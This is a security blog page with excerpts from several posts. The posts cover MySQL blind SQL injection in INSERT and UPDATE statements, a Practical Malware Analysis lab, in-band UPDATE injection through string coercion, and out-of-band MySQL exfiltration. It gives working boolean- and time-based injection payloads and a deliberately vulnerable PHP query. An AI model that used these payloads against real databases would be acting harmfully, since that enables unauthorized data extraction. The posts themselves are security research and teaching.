MySQL Blind Injection in Insert and Update Statements

I’m not going to explain or write about blind injection in general. There are enough resources on the internet where you can learn. You can check my previous post where I have explained in detail about other types of injections in these statements. Since some of you asked me how to perform blind injection I thought of writing this post.

Boolean Based Blind Injection

We can use ‘+’ or bitwise OR in this scenario. If the result is true the entry will be updated with a ‘1’ and if the result is false the entry will be updated with a ‘0’.
I’m using binary search to make the search faster. Mid = (max+min)/2.
However I’m not sure if this is realistic.

update users set username =0’ | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;
insert into users values (15,’osanda’,'0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

Time Based Blind Injection

This approach would be realistic. In this case we can use functions such as sleep(), benchmark(). Like before by using ‘+’ or bitwise OR we can know if the result is true or false when updated or inserted.

update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
insert into users values (16,’osanda’,'0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));

Conclusion

The same can be applied to DELETE statements as well, but the injection is not realistic. There are many methods you can follow using the above syntax. You can develop your own tool to automate this process and improve the efficiency of the search.

Advertisements

Lab01-01 Analysis

In my leisure time I like reading the book Practical Malware Analysis and I thought of sharing my analysis in the practical sections. You can find detailed answers in the book as well.

Lab01-01.dll Analysis

If we have a look at the “Lab01-01.dll” file’s imports we can see that it uses network functions from “ws2_32.dll”. We can suspect that this file is responsible for network communications to the attacker.
imports-of-dll

But if we have a look at the exports section we see nothing, which is strange.
no-exports-dll
Continue reading

MySQL Injection in Update, Insert and Delete

Overview

The traditional in-band method in INSERT, UPDATE injections would be by fixing the query. For example in INSERT statements one can simply fix the query, comment out the rest and extract the data once it is echoed out by the application. Same goes with the UPDATE statement, but only if the query has more than one column we can fix the query. What if we face a situation where UPDATE or INSERT has one column or simply we don’t know the exact query to fix? What if mysql_error() is not echoed out?
Let’s look at the following scenario. For simplicity’s sake let’s not make things complex. The updated username is also echoed back to us. How can we inject in this scenario?

$query = "UPDATE users SET username = '$username' WHERE id = '$id';";

The parameters are as follows for the update query.

username=test&id=16 

Recently I was researching on different in-band and out-of-band techniques we can apply in these situations.
To understand my technique let’s look at how MySQL handles strings. Basically a string is equal to ‘0’ in MySQL. Let me prove it.

mysql> select 'osanda' = 0;
+--------------+
| 'osanda' = 0 |
+--------------+
|            1 |
+--------------+

mysql> select !'osanda';
+-----------+
| !'osanda' |
+-----------+
|         1 |
+-----------+

What if we add digits to a string? It would be same as adding a value to 0.

mysql> select 'osanda'+123;
+--------------+
| 'osanda'+123 |
+--------------+
|          123 |
+--------------+

Continue reading

MySQL Out-of-Band Hacking

Overview

Out-of-band injections are very well researched when it comes to MSSQL and Oracle. But in MySQL I noticed that this topic is not well researched. I thought of researching about this topic based on my experiences in SQL injections. For this purpose we can take advantage of functions such as load_file() and select … into outfile/dumpfile. Apart from that we can also steal NetNTLM hashes and perform SMB relay attacks. All this is possible only in MySQL under Windows.

What is Out-of-Band Injection?

These attacks involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.

Limitations in MySQL

In MySQL there exists a global system variable known as ‘secure_file_priv’. This variable is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA and SELECT … INTO OUTFILE statements and the LOAD_FILE() function.

  • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist, the server will not create it.
  • If the variable is empty it has no effect, thus insecure configuration.
  • If set to NULL, the server disables import and export operations. This value is permitted as of MySQL 5.5.53

Before MySQL 5.5.53 this variable is empty by default, hence allowing us to use these functions. But in the versions after 5.5.53 the value ‘NULL’ will disable these functions.
To check the value of this variable you can use any of these methods. The ‘secure_file_priv’ is a global variable and it’s a read only variable, which means you cannot change this during runtime.

select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv"; 

Continue reading